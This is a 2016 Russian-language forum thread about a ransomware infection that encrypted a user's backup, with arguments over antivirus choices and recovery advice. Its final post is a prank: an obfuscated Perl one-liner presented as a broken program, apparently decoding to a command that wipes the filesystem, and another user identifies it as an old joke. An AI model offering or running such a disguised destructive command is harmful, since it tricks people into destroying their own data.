Бэкап от Акрониса тоже зашифровался ))
та его ж надо хранить гдето в другом месте... это тоже самое если бы полетел жд... бэкап вроде есть, но вроде нет
Отправлено 30 октября 2016 - 11:08
Бэкап от Акрониса тоже зашифровался ))
та его ж надо хранить гдето в другом месте... это тоже самое если бы полетел жд... бэкап вроде есть, но вроде нет
Отправлено 30 октября 2016 - 17:27
Антивирус в 2016? Пфф..
скажу одно MSE от майкрасофт скачаи бесплатныи ловит много жрет ресурсов мало в настроиках ставь все удолять не лечить !! и будет збз
Икона у входной двери полезнее будет, чем это дерьмо.
Отправлено 30 октября 2016 - 21:22
Антивирус в 2016? Пфф..
Икона у входной двери полезнее будет, чем это дерьмо.
ну я сис админ мне веднее наверно)
Отправлено 30 октября 2016 - 21:28
ну я сис админ мне веднее наверно)
Хреновая аргументация, скажу я вам.
Готовим Айрона к прокачке:
Отправлено 30 октября 2016 - 22:24
Если жлобтерьер и, как я понимаю, винда пиратская, то лепи бесплатный AVG;
раз в полгодика триалку каспера и гоняй вшей недобитых авэгэшкой;
а поделу -есть вирусы, последстия которых можно устранить по большей части, но для начала надо убрать все следы вируса и снос винды даже и близко не решает таких проблем;
антивирусы так же не все вирусы стопают - сам видел как жопорук имея лицуху каспера впоймал вируса; свинья визжит да программки все ставятся да ставятся; "гениальным действием" его был ребут компа - ясен пень что уже после этого полностью восстановить последствия было нельзя и я потом еще долго рылся и выпиливал затаившихся товарищей;
в твоём случае надо форматировать хард и потом восстановить информацию копированием на другой хард -звучи ткак то тупо и примитивно, но немогу по другому процесс описать; восстановить все можно - прост оен обращайся к хапугам вешающим " облуживание пк" на столбы и подъезды домов
Ее мы помним с детства,
А может, и не с детства,
А может, и не помним,
Но будем вспоминать..
Отправлено 31 октября 2016 - 09:14
У меня тут что-то прога не работает, можешь посмотреть, что не так?
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
Эта шутка была в ходу, когда мой дед был молодым.
0 пользователей, 0 гостей, 0 скрытых пользователей